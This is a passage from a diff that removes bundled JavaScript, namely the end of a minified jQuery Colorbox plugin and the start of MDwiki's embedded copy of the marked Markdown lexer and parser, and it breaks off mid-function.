q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,Y,d={transition:"elastic",speed:300,width:!1,initialWidth:"600",innerWidth:!1,maxWidth:!1,height:!1,initialHeight:"450",innerHeight:!1,maxHeight:!1,scalePhotos:!0,scrolling:!0,inline:!1,html:!1,iframe:!1,fastIframe:!0,photo:!1,href:!1,title:!1,rel:!1,opacity:.9,preloading:!0,current:"image {current} of {total}",previous:"previous",next:"next",close:"close",xhrError:"This content failed to load.",imgError:"This image failed to load.",open:!1,returnFocus:!0,reposition:!0,loop:!0,slideshow:!1,slideshowAuto:!0,slideshowSpeed:2500,slideshowStart:"start slideshow",slideshowStop:"stop slideshow",onOpen:!1,onLoad:!1,onComplete:!1,onCleanup:!1,onClosed:!1,overlayClose:!0,escKey:!0,arrowKey:!0,top:!1,bottom:!1,left:!1,right:!1,fixed:!1,data:void 0},e="colorbox",f="cbox",g=f+"Element",h=f+"_open",i=f+"_load",j=f+"_complete",k=f+"_cleanup",l=f+"_closed",m=f+"_purge",n=!a.support.opacity&&!a.support.style,o=n&&!c.XMLHttpRequest,p=f+"_IE6",X="div";a.colorbox||(a(hb),W=a.fn[e]=a[e]=function(b,c){var f=this;if(b=b||{},hb(),ib()){if(!f[0]){if(f.selector)return f;f=a("<a/>"),b.open=!0}c&&(b.onComplete=c),f.each(function(){a.data(this,e,a.extend({},a.data(this,e)||d,b))}).addClass(g),(a.isFunction(b.open)&&b.open.call(f)||b.open)&&gb(f[0])}return f},W.position=function(a,b){function j(a){u[0].style.width=x[0].style.width=t[0].style.width=a.style.width,t[0].style.height=v[0].style.height=w[0].style.height=a.style.height}var c,h,i,d=0,e=0,g=r.offset();z.unbind("resize."+f),r.css({top:-9e4,left:-9e4}),h=z.scrollTop(),i=z.scrollLeft(),K.fixed&&!o?(g.top-=h,g.left-=i,r.css({position:"fixed"})):(d=h,e=i,r.css({position:"absolute"})),e+=K.right!==!1?Math.max(bb()-K.w-O-M-_(K.right,"x"),0):K.left!==!1?_(K.left,"x"):Math.round(Math.max(bb()-K.w-O-M,0)/2),d+=K.bottom!==!1?Math.max(cb()-K.h-N-L-_(K.bottom,"y"),0):K.top!==!1?_(K.top,"y"):Math.round(Math.max(cb()-K.h-N-L,0)/2),r.css({top:g.top,left:g.left}),a=r.width()===K.w+O&&r.height()===K.h+N?0:a||0,s[0].style.width=s[0].style.height="9999px",c={width:K.w+O,height:K.h+N,top:d,left:e},0===a&&r.css(c),r.dequeue().animate(c,{duration:a,complete:function(){j(this),T=!1,s[0].style.width=K.w+O+M+"px",s[0].style.height=K.h+N+L+"px",K.reposition&&setTimeout(function(){z.bind("resize."+f,W.position)},1),b&&b()},step:function(){j(this)}})},W.resize=function(a){S&&(a=a||{},a.width&&(K.w=_(a.width,"x")-O-M),a.innerWidth&&(K.w=_(a.innerWidth,"x")),A.css({width:K.w}),a.height&&(K.h=_(a.height,"y")-N-L),a.innerHeight&&(K.h=_(a.innerHeight,"y")),a.innerHeight||a.height||(A.css({height:"auto"}),K.h=A.height()),A.css({height:K.h}),W.position("none"===K.transition?0:K.speed))},W.prep=function(b){function g(){return K.w=K.w||A.width(),K.w=K.mw&&K.mw<K.w?K.mw:K.w,K.w}function h(){return K.h=K.h||A.height(),K.h=K.mh&&K.mh<K.h?K.mh:K.h,K.h}if(S){var c,d="none"===K.transition?0:K.speed;A.remove(),A=Z(X,"LoadedContent").append(b),A.hide().appendTo(B.show()).css({width:g(),overflow:K.scrolling?"auto":"hidden"}).css({height:h()}).prependTo(t),B.hide(),a(R).css({"float":"none"}),o&&a("select").not(r.find("select")).filter(function(){return"hidden"!==this.style.visibility}).css({visibility:"hidden"}).one(k,function(){this.style.visibility="inherit"}),c=function(){function s(){n&&r[0].style.removeAttribute("filter")}var b,c,h,l,o,p,q,g=y.length,i="frameBorder",k="allowTransparency";if(S){if(l=function(){clearTimeout(V),C.detach().hide(),eb(j,K.onComplete)},n&&R&&A.fadeIn(100),D.html(K.title).add(A).show(),g>1){if("string"==typeof K.current&&E.html(K.current.replace("{current}",Q+1).replace("{total}",g)).show(),G[K.loop||g-1>Q?"show":"hide"]().html(K.next),H[K.loop||Q?"show":"hide"]().html(K.previous),K.slideshow&&F.show(),K.preloading)for(b=[$(-1),$(1)];c=y[b.pop()];)q=a.data(c,e),q&&q.href?(o=q.href,a.isFunction(o)&&(o=o.call(c))):o=c.href,ab(o)&&(p=new Image,p.src=o)}else J.hide();K.iframe?(h=Z("iframe")[0],i in h&&(h[i]=0),k in h&&(h[k]="true"),h.name=f+ +new Date,K.fastIframe?l():a(h).one("load",l),h.src=K.href,K.scrolling||(h.scrolling="no"),a(h).addClass(f+"Iframe").appendTo(A).one(m,function(){h.src="//about:blank"})):l(),"fade"===K.transition?r.fadeTo(d,1,s):s()}},"fade"===K.transition?r.fadeTo(d,0,function(){W.position(0,c)}):W.position(d,c)}},W.load=function(b){var c,d,e=W.prep;T=!0,R=!1,P=y[Q],b||db(),eb(m),eb(i,K.onLoad),K.h=K.height?_(K.height,"y")-N-L:K.innerHeight&&_(K.innerHeight,"y"),K.w=K.width?_(K.width,"x")-O-M:K.innerWidth&&_(K.innerWidth,"x"),K.mw=K.w,K.mh=K.h,K.maxWidth&&(K.mw=_(K.maxWidth,"x")-O-M,K.mw=K.w&&K.w<K.mw?K.w:K.mw),K.maxHeight&&(K.mh=_(K.maxHeight,"y")-N-L,K.mh=K.h&&K.h<K.mh?K.h:K.mh),c=K.href,V=setTimeout(function(){C.show().appendTo(t)},100),K.inline?(Z(X).hide().insertBefore(a(c)[0]).one(m,function(){a(this).replaceWith(A.children())}),e(a(c))):K.iframe?e(" "):K.html?e(K.html):ab(c)?(a(R=new Image).addClass(f+"Photo").error(function(){K.title=!1,e(Z(X,"Error").html(K.imgError))}).load(function(){var a;R.onload=null,K.scalePhotos&&(d=function(){R.height-=R.height*a,R.width-=R.width*a},K.mw&&R.width>K.mw&&(a=(R.width-K.mw)/R.width,d()),K.mh&&R.height>K.mh&&(a=(R.height-K.mh)/R.height,d())),K.h&&(R.style.marginTop=Math.max(K.h-R.height,0)/2+"px"),y[1]&&(K.loop||y[Q+1])&&(R.style.cursor="pointer",R.onclick=function(){W.next()}),n&&(R.style.msInterpolationMode="bicubic"),setTimeout(function(){e(R)},1)}),setTimeout(function(){R.src=c},1)):c&&B.load(c,K.data,function(b,c){e("error"===c?Z(X,"Error").html(K.xhrError):a(this).contents())})},W.next=function(){!T&&y[1]&&(K.loop||y[Q+1])&&(Q=$(1),W.load())},W.prev=function(){!T&&y[1]&&(K.loop||Q)&&(Q=$(-1),W.load())},W.close=function(){S&&!U&&(U=!0,S=!1,eb(k,K.onCleanup),z.unbind("."+f+" ."+p),q.fadeTo(200,0),r.stop().fadeTo(300,0,function(){r.add(q).css({opacity:1,cursor:"auto"}).hide(),eb(m),A.remove(),setTimeout(function(){U=!1,eb(l,K.onClosed)},1)}))},W.remove=function(){a([]).add(r).add(q).remove(),r=null,a("."+g).removeData(e).removeClass(g).die()},W.element=function(){return a(P)},W.settings=d)})(jQuery,document,this);</script>
-<!-- END extlib/js/jquery.colorbox.min.js -->
-<!-- START dist/MDwiki.js -->
-<script type="text/javascript">;(function() {
-
-/**
- * Block-Level Grammar
- */
-
-var block = {
-  newline: /^\n+/,
-  code: /^( {4}[^\n]+\n*)+/,
-  fences: noop,
-  hr: /^( *[-*_]){3,} *(?:\n+|$)/,
-  heading: /^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,
-  nptable: noop,
-  lheading: /^([^\n]+)\n *(=|-){3,} *\n*/,
-  blockquote: /^( *>[^\n]+(\n[^\n]+)*\n*)+/,
-  list: /^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,
-  html: /^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,
-  def: /^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,
-  table: noop,
-  paragraph: /^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,
-  text: /^[^\n]+/
-};
-
-block.bullet = /(?:[*+-]|\d+\.)/;
-block.item = /^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/;
-block.item = replace(block.item, 'gm')
-  (/bull/g, block.bullet)
-  ();
-
-block.list = replace(block.list)
-  (/bull/g, block.bullet)
-  ('hr', /\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)
-  ();
-
-block._tag = '(?!(?:'
-  + 'a|em|strong|small|s|cite|q|dfn|abbr|data|time|code'
-  + '|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo'
-  + '|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b';
-
-block.html = replace(block.html)
-  ('comment', /<!--[\s\S]*?-->/)
-  ('closed', /<(tag)[\s\S]+?<\/\1>/)
-  ('closing', /<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)
-  (/tag/g, block._tag)
-  ();
-
-block.paragraph = replace(block.paragraph)
-  ('hr', block.hr)
-  ('heading', block.heading)
-  ('lheading', block.lheading)
-  ('blockquote', block.blockquote)
-  ('tag', '<' + block._tag)
-  ('def', block.def)
-  ();
-
-/**
- * Normal Block Grammar
- */
-
-block.normal = merge({}, block);
-
-/**
- * GFM Block Grammar
- */
-
-block.gfm = merge({}, block.normal, {
-  fences: /^ *(`{3,}|~{3,}) *(\S+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,
-  paragraph: /^/
-});
-
-block.gfm.paragraph = replace(block.paragraph)
-  ('(?!', '(?!' + block.gfm.fences.source.replace('\\1', '\\2') + '|')
-  ();
-
-/**
- * GFM + Tables Block Grammar
- */
-
-block.tables = merge({}, block.gfm, {
-  nptable: /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,
-  table: /^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/
-});
-
-/**
- * Block Lexer
- */
-
-function Lexer(options) {
-  this.tokens = [];
-  this.tokens.links = {};
-  this.options = options || marked.defaults;
-  this.rules = block.normal;
-
-  if (this.options.gfm) {
-    if (this.options.tables) {
-      this.rules = block.tables;
-    } else {
-      this.rules = block.gfm;
-    }
-  }
-}
-
-/**
- * Expose Block Rules
- */
-
-Lexer.rules = block;
-
-/**
- * Static Lex Method
- */
-
-Lexer.lex = function(src, options) {
-  var lexer = new Lexer(options);
-  return lexer.lex(src);
-};
-
-/**
- * Preprocessing
- */
-
-Lexer.prototype.lex = function(src) {
-  src = src
-    .replace(/\r\n|\r/g, '\n')
-    .replace(/\t/g, '    ')
-    .replace(/\u00a0/g, ' ')
-    .replace(/\u2424/g, '\n');
-
-  return this.token(src, true);
-};
-
-/**
- * Lexing
- */
-
-Lexer.prototype.token = function(src, top) {
-  var src = src.replace(/^ +$/gm, '')
-    , next
-    , loose
-    , cap
-    , bull
-    , b
-    , item
-    , space
-    , i
-    , l;
-
-  while (src) {
-    // newline
-    if (cap = this.rules.newline.exec(src)) {
-      src = src.substring(cap[0].length);
-      if (cap[0].length > 1) {
-        this.tokens.push({
-          type: 'space'
-        });
-      }
-    }
-
-    // code
-    if (cap = this.rules.code.exec(src)) {
-      src = src.substring(cap[0].length);
-      cap = cap[0].replace(/^ {4}/gm, '');
-      this.tokens.push({
-        type: 'code',
-        text: !this.options.pedantic
-          ? cap.replace(/\n+$/, '')
-          : cap
-      });
-      continue;
-    }
-
-    // fences (gfm)
-    if (cap = this.rules.fences.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'code',
-        lang: cap[2],
-        text: cap[3]
-      });
-      continue;
-    }
-
-    // heading
-    if (cap = this.rules.heading.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'heading',
-        depth: cap[1].length,
-        text: cap[2]
-      });
-      continue;
-    }
-
-    // table no leading pipe (gfm)
-    if (top && (cap = this.rules.nptable.exec(src))) {
-      src = src.substring(cap[0].length);
-
-      item = {
-        type: 'table',
-        header: cap[1].replace(/^ *| *\| *$/g, '').split(/ *\| */),
-        align: cap[2].replace(/^ *|\| *$/g, '').split(/ *\| */),
-        cells: cap[3].replace(/\n$/, '').split('\n')
-      };
-
-      for (i = 0; i < item.align.length; i++) {
-        if (/^ *-+: *$/.test(item.align[i])) {
-          item.align[i] = 'right';
-        } else if (/^ *:-+: *$/.test(item.align[i])) {
-          item.align[i] = 'center';
-        } else if (/^ *:-+ *$/.test(item.align[i])) {
-          item.align[i] = 'left';
-        } else {
-          item.align[i] = null;
-        }
-      }
-
-      for (i = 0; i < item.cells.length; i++) {
-        item.cells[i] = item.cells[i].split(/ *\| */);
-      }
-
-      this.tokens.push(item);
-
-      continue;
-    }
-
-    // lheading
-    if (cap = this.rules.lheading.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'heading',
-        depth: cap[2] === '=' ? 1 : 2,
-        text: cap[1]
-      });
-      continue;
-    }
-
-    // hr
-    if (cap = this.rules.hr.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'hr'
-      });
-      continue;
-    }
-
-    // blockquote
-    if (cap = this.rules.blockquote.exec(src)) {
-      src = src.substring(cap[0].length);
-
-      this.tokens.push({
-        type: 'blockquote_start'
-      });
-
-      cap = cap[0].replace(/^ *> ?/gm, '');
-
-      // Pass `top` to keep the current
-      // "toplevel" state. This is exactly
-      // how markdown.pl works.
-      this.token(cap, top);
-
-      this.tokens.push({
-        type: 'blockquote_end'
-      });
-
-      continue;
-    }
-
-    // list
-    if (cap = this.rules.list.exec(src)) {
-      src = src.substring(cap[0].length);
-      bull = cap[2];
-
-      this.tokens.push({
-        type: 'list_start',
-        ordered: bull.length > 1
-      });
-
-      // Get each top-level item.
-      cap = cap[0].match(this.rules.item);
-
-      next = false;
-      l = cap.length;
-      i = 0;
-
-      for (; i < l; i++) {
-        item = cap[i];
-
-        // Remove the list item's bullet
-        // so it is seen as the next token.
-        space = item.length;
-        item = item.replace(/^ *([*+-]|\d+\.) +/, '');
-
-        // Outdent whatever the
-        // list item contains. Hacky.
-        if (~item.indexOf('\n ')) {
-          space -= item.length;
-          item = !this.options.pedantic
-            ? item.replace(new RegExp('^ {1,' + space + '}', 'gm'), '')
-            : item.replace(/^ {1,4}/gm, '');
-        }
-
-        // Determine whether the next list item belongs here.
-        // Backpedal if it does not belong in this list.
-        if (this.options.smartLists && i !== l - 1) {
-          b = block.bullet.exec(cap[i+1])[0];
-          if (bull !== b && !(bull.length > 1 && b.length > 1)) {
-            src = cap.slice(i + 1).join('\n') + src;
-            i = l - 1;
-          }
-        }
-
-        // Determine whether item is loose or not.
-        // Use: /(^|\n)(?! )[^\n]+\n\n(?!\s*$)/
-        // for discount behavior.
-        loose = next || /\n\n(?!\s*$)/.test(item);
-        if (i !== l - 1) {
-          next = item[item.length-1] === '\n';
-          if (!loose) loose = next;
-        }
-
-        this.tokens.push({
-          type: loose
-            ? 'loose_item_start'
-            : 'list_item_start'
-        });
-
-        // Recurse.
-        this.token(item, false);
-
-        this.tokens.push({
-          type: 'list_item_end'
-        });
-      }
-
-      this.tokens.push({
-        type: 'list_end'
-      });
-
-      continue;
-    }
-
-    // html
-    if (cap = this.rules.html.exec(src)) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: this.options.sanitize
-          ? 'paragraph'
-          : 'html',
-        pre: cap[1] === 'pre' || cap[1] === 'script',
-        text: cap[0]
-      });
-      continue;
-    }
-
-    // def
-    if (top && (cap = this.rules.def.exec(src))) {
-      src = src.substring(cap[0].length);
-      this.tokens.links[cap[1].toLowerCase()] = {
-        href: cap[2],
-        title: cap[3]
-      };
-      continue;
-    }
-
-    // table (gfm)
-    if (top && (cap = this.rules.table.exec(src))) {
-      src = src.substring(cap[0].length);
-
-      item = {
-        type: 'table',
-        header: cap[1].replace(/^ *| *\| *$/g, '').split(/ *\| */),
-        align: cap[2].replace(/^ *|\| *$/g, '').split(/ *\| */),
-        cells: cap[3].replace(/(?: *\| *)?\n$/, '').split('\n')
-      };
-
-      for (i = 0; i < item.align.length; i++) {
-        if (/^ *-+: *$/.test(item.align[i])) {
-          item.align[i] = 'right';
-        } else if (/^ *:-+: *$/.test(item.align[i])) {
-          item.align[i] = 'center';
-        } else if (/^ *:-+ *$/.test(item.align[i])) {
-          item.align[i] = 'left';
-        } else {
-          item.align[i] = null;
-        }
-      }
-
-      for (i = 0; i < item.cells.length; i++) {
-        item.cells[i] = item.cells[i]
-          .replace(/^ *\| *| *\| *$/g, '')
-          .split(/ *\| */);
-      }
-
-      this.tokens.push(item);
-
-      continue;
-    }
-
-    // top-level paragraph
-    if (top && (cap = this.rules.paragraph.exec(src))) {
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'paragraph',
-        text: cap[1][cap[1].length-1] === '\n'
-          ? cap[1].slice(0, -1)
-          : cap[1]
-      });
-      continue;
-    }
-
-    // text
-    if (cap = this.rules.text.exec(src)) {
-      // Top-level should never reach here.
-      src = src.substring(cap[0].length);
-      this.tokens.push({
-        type: 'text',
-        text: cap[0]
-      });
-      continue;
-    }
-
-    if (src) {
-      throw new
-        Error('Infinite loop on byte: ' + src.charCodeAt(0));
-    }
-  }
-
-  return this.tokens;
-};
-
-/**
- * Inline-Level Grammar
- */
-
-var inline = {
-  escape: /^\\([\\`*{}\[\]()#+\-.!_>])/,
-  autolink: /^<([^ >]+(@|:\/)[^ >]+)>/,
-  url: noop,
-  tag: /^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,
-  link: /^!?\[(inside)\]\(href\)/,
-  reflink: /^!?\[(inside)\]\s*\[([^\]]*)\]/,
-  nolink: /^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,
-  strong: /^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,
-  em: /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,
-  code: /^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,
-  br: /^ {2,}\n(?!\s*$)/,
-  del: noop,
-  text: /^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/
-};
-
-inline._inside = /(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/;
-inline._href = /\s*<?(.*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/;
-
-inline.link = replace(inline.link)
-  ('inside', inline._inside)
-  ('href', inline._href)
-  ();
-
-inline.reflink = replace(inline.reflink)
-  ('inside', inline._inside)
-  ();
-
-/**
- * Normal Inline Grammar
- */
-
-inline.normal = merge({}, inline);
-
-/**
- * Pedantic Inline Grammar
- */
-
-inline.pedantic = merge({}, inline.normal, {
-  strong: /^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,
-  em: /^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/
-});
-
-/**
- * GFM Inline Grammar
- */
-
-inline.gfm = merge({}, inline.normal, {
-  escape: replace(inline.escape)('])', '~|])')(),
-  url: /^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,
-  del: /^~~(?=\S)([\s\S]*?\S)~~/,
-  text: replace(inline.text)
-    (']|', '~]|')
-    ('|', '|https?://|')
-    ()
-});
-
-/**
- * GFM + Line Breaks Inline Grammar
- */
-
-inline.breaks = merge({}, inline.gfm, {
-  br: replace(inline.br)('{2,}', '*')(),
-  text: replace(inline.gfm.text)('{2,}', '*')()
-});
-
-/**
- * Inline Lexer & Compiler
- */
-
-function InlineLexer(links, options) {
-  this.options = options || marked.defaults;
-  this.links = links;
-  this.rules = inline.normal;
-
-  if (!this.links) {
-    throw new
-      Error('Tokens array requires a `links` property.');
-  }
-
-  if (this.options.gfm) {
-    if (this.options.breaks) {
-      this.rules = inline.breaks;
-    } else {
-      this.rules = inline.gfm;
-    }
-  } else if (this.options.pedantic) {
-    this.rules = inline.pedantic;
-  }
-}
-
-/**
- * Expose Inline Rules
- */
-
-InlineLexer.rules = inline;
-
-/**
- * Static Lexing/Compiling Method
- */
-
-InlineLexer.output = function(src, links, options) {
-  var inline = new InlineLexer(links, options);
-  return inline.output(src);
-};
-
-/**
- * Lexing/Compiling
- */
-
-InlineLexer.prototype.output = function(src) {
-  var out = ''
-    , link
-    , text
-    , href
-    , cap;
-
-  while (src) {
-    // escape
-    if (cap = this.rules.escape.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += cap[1];
-      continue;
-    }
-
-    // autolink
-    if (cap = this.rules.autolink.exec(src)) {
-      src = src.substring(cap[0].length);
-      if (cap[2] === '@') {
-        text = cap[1][6] === ':'
-          ? this.mangle(cap[1].substring(7))
-          : this.mangle(cap[1]);
-        href = this.mangle('mailto:') + text;
-      } else {
-        text = escape(cap[1]);
-        href = text;
-      }
-      out += '<a href="'
-        + href
-        + '">'
-        + text
-        + '</a>';
-      continue;
-    }
-
-    // url (gfm)
-    if (cap = this.rules.url.exec(src)) {
-      src = src.substring(cap[0].length);
-      text = escape(cap[1]);
-      href = text;
-      out += '<a href="'
-        + href
-        + '">'
-        + text
-        + '</a>';
-      continue;
-    }
-
-    // tag
-    if (cap = this.rules.tag.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += this.options.sanitize
-        ? escape(cap[0])
-        : cap[0];
-      continue;
-    }
-
-    // link
-    if (cap = this.rules.link.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += this.outputLink(cap, {
-        href: cap[2],
-        title: cap[3]
-      });
-      continue;
-    }
-
-    // reflink, nolink
-    if ((cap = this.rules.reflink.exec(src))
-        || (cap = this.rules.nolink.exec(src))) {
-      src = src.substring(cap[0].length);
-      link = (cap[2] || cap[1]).replace(/\s+/g, ' ');
-      link = this.links[link.toLowerCase()];
-      if (!link || !link.href) {
-        out += cap[0][0];
-        src = cap[0].substring(1) + src;
-        continue;
-      }
-      out += this.outputLink(cap, link);
-      continue;
-    }
-
-    // strong
-    if (cap = this.rules.strong.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<strong>'
-        + this.output(cap[2] || cap[1])
-        + '</strong>';
-      continue;
-    }
-
-    // em
-    if (cap = this.rules.em.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<em>'
-        + this.output(cap[2] || cap[1])
-        + '</em>';
-      continue;
-    }
-
-    // code
-    if (cap = this.rules.code.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<code>'
-        + escape(cap[2], true)
-        + '</code>';
-      continue;
-    }
-
-    // br
-    if (cap = this.rules.br.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<br>';
-      continue;
-    }
-
-    // del (gfm)
-    if (cap = this.rules.del.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += '<del>'
-        + this.output(cap[1])
-        + '</del>';
-      continue;
-    }
-
-    // text
-    if (cap = this.rules.text.exec(src)) {
-      src = src.substring(cap[0].length);
-      out += escape(cap[0]);
-      continue;
-    }
-
-    if (src) {
-      throw new
-        Error('Infinite loop on byte: ' + src.charCodeAt(0));
-    }
-  }
-
-  return out;
-};
-
-/**
- * Compile Link
- */
-
-InlineLexer.prototype.outputLink = function(cap, link) {
-  if (cap[0][0] !== '!') {
-    return '<a href="'
-      + escape(link.href)
-      + '"'
-      + (link.title
-      ? ' title="'
-      + escape(link.title)
-      + '"'
-      : '')
-      + '>'
-      + this.output(cap[1])
-      + '</a>';
-  } else {
-    return '<img src="'
-      + escape(link.href)
-      + '" alt="'
-      + escape(cap[1])
-      + '"'
-      + (link.title
-      ? ' title="'
-      + escape(link.title)
-      + '"'
-      : '')
-      + '>';
-  }
-};
-
-/**
- * Smartypants Transformations
- */
-
-InlineLexer.prototype.smartypants = function(text) {
-  if (!this.options.smartypants) return text;
-  return text
-    .replace(/--/g, '—')
-    .replace(/'([^']*)'/g, '‘$1’')
-    .replace(/"([^"]*)"/g, '“$1”')
-    .replace(/\.{3}/g, '…');
-};
-
-/**
- * Mangle Links
- */
-
-InlineLexer.prototype.mangle = function(text) {
-  var out = ''
-    , l = text.length
-    , i = 0
-    , ch;
-
-  for (; i < l; i++) {
-    ch = text.charCodeAt(i);
-    if (Math.random() > 0.5) {
-      ch = 'x' + ch.toString(16);
-    }
-    out += '&#' + ch + ';';
-  }
-
-  return out;
-};
-
-/**
- * Parsing & Compiling
- */
-
-function Parser(options) {
-  this.tokens = [];
-  this.token = null;
-  this.options = options || marked.defaults;
-}
-
-/**
- * Static Parse Method
- */
-
-Parser.parse = function(src, options) {
-  var parser = new Parser(options);
-  return parser.parse(src);
-};
-
-/**
- * Parse Loop
- */
-
-Parser.prototype.parse = function(src) {
-  this.inline = new InlineLexer(src.links, this.options);
-  this.tokens = src.reverse();
-
-  var out = '';
-  while (this.next()) {
-    out += this.tok();
-  }
-
-  return out;
-};
-
-/**
- * Next Token
- */
-
-Parser.prototype.next = function() {
-  return this.token = this.tokens.pop();
-};
-
-/**
- * Preview Next Token
- */
-
-Parser.prototype.peek = function() {
-  return this.tokens[this.tokens.length-1] || 0;
-};
-
-/**
- * Parse Text Tokens
- */
-
-Parser.prototype.parseText = function() {
-  var body = this.token.text;
-
-  while (this.peek().type === 'text') {
-    body += '\n' + this.next().text;
-  }
-
-  return this.inline.output(body);
-};
-
-/**
- * Parse Current Token
- */
-
-Parser.prototype.tok = function() {
-  switch (this.token.type) {
-    case 'space': {
-      return '';
-    }
-    case 'hr': {
-      return '<hr>\n';
-    }
-    case 'heading': {
-      return '<h'
-        + this.token.depth
-        + '>'
-        + this.inline.output(this.token.text)
-        + '</h'
-        + this.token.depth
-        + '>\n';
-    }
-    case 'code': {
-      if (this.options.highlight) {
-        var code = this.options.highlight(this.token.text, this.token.lang);
-        if (code != null && code !== this.token.text) {
-          this.token.escaped = true;
-          this.token.text = code;
-        }
-      }
-
-      if (!this.token.escaped) {
-        this.token.text = escape(this.token.text, true);
-      }
-
-      return '<pre><code'
-        + (this.token.lang
-        ? ' class="'
-        + this.options.langPrefix
-        + this.token.lang
-        + '"'
-        : '')
-        + '>'
-        + this.token.text
-        + '</code></pre>\n';
-    }
-    case 'table': {
-      var body = ''
-        , heading
-        , i
-        , row
-        , cell
-        , j;
-
-      // header
-      body += '<thead>\n<tr>\n';
-      for (i = 0; i < this.token.header.length; i++) {
-        heading = this.inline.output(this.token.header[i]);
-        body += this.token.align[i]
-          ? '<th align="' + this.token.align[i] + '">' + heading + '</th>\n'
-          : '<th>' + heading + '</th>\n';
-      }
-      body += '</tr>\n</thead>\n';
-
-      // body
-      body += '<tbody>\n'
-      for (i = 0; i < this.token.cells.length; i++) {
-        row = this.token.cells[i];
-        body += '<tr>\n';
-        for (j = 0; j < row.length; j++) {
-          cell = this.inline.output(row[j]);
-          body += this.token.align[j]
-            ? '<td align="' + this.token.align[j] + '">' + cell + '</td>\n'
-            : '<td>' + cell + '</td>\n';
-        }
-        body += '</tr>\n';
-      }
-      body += '</tbody>\n';
-
-      return '<table>\n'
-        + body
-        + '</table>\n';
-    }
-    case 'blockquote_start': {
-      var body = '';
-
-      while (this.next().type !== 'blockquote_end') {
-        body += this.tok();
-      }
-
-      return '<blockquote>\n'
-        + body
-        + '</blockquote>\n';
-    }
-    case 'list_start': {
-      var type = this.token.ordered ? 'ol' : 'ul'
-        , body = '';
-
-      while (this.next().type !== 'list_end') {
-        body += this.tok();
-      }
-
-      return '<'
-        + type
-        + '>\n'
-        + body
-        + '</'
-        + type
-        + '>\n';
-    }
-    case 'list_item_start': {
-      var body = '';
-
-      while (this.next().type !== 'list_item_end') {
-        body += this.token.type === 'text'
-          ? this.parseText()
-          : this.tok();
-      }
-
-      return '<li>'
-        + body
-        + '</li>\n';
-    }
-    case 'loose_item_start': {
-      var body = '';
-
-      while (this.next().type !== 'list_item_end') {
-        body += this.tok();
-      }
-
-      return '<li>'
-        + body
-        + '</li>\n';
-    }
-    case 'html': {
-      return !this.token.pre && !this.options.pedantic
-        ? this.inline.output(this.token.text)
-        : this.token.text;
-    }
-    case 'paragraph': {
-      return '<p>'
-        + this.inline.output(this.token.text)
-        + '</p>\n';
-    }
-    case 'text': {
-      return '<p>'
-        + this.parseText()
-        + '</p>\n';
-    }
-  }
-};
-
-/**
- * Helpers
- */
-
-function escape(html, encode) {
-  return html
-    .replace(!encode ? /&(?!#?\w+;)/g : /&/g, '&amp;')
-    .replace(/</g, '&lt;')
-    .replace(/>/g, '&gt;')
-    .replace(/"/g, '&quot;')
-    .replace(/'/g, '&#39;');
-}
-
-function replace(regex, opt) {
-  regex = regex.source;
-  opt = opt || '';
-  return function self(name, val) {
-    if (!name) return new RegExp(regex, opt);
-    val = val.source || val;
-    val = val.replace(/(^|[^\[])\^/g, '$1');
-    regex = regex.replace(name, val);
-    return self;
-  };
-}
-
-function noop() {}
-noop.exec = noop;
-
-function merge(obj) {
-  var i = 1
-    , target
-    , key;
-
-  for (; i < arguments.length; i++) {
-    target = arguments[i];
-    for (key in target) {
-      if (Object.prototype.hasOwnProperty.call(target, key)) {
-        obj[key] = target[key];
-      }
-    }
-  }
-
-  return obj;
-}
-
-/**
- * Marked
- */
-
-function marked(src, opt, callback) {
-  if (callback || typeof opt === 'function') {
-    if (!callback) {
-      callback = opt;
-      opt = null;
-    }
-
-    if (opt) opt = merge({}, marked.defaults, opt);
-
-    var tokens = Lexer.lex(tokens, opt)
-      , highlight = opt.highlight
-      , pending = 0
-      , l = tokens.length
-      , i = 0;
-
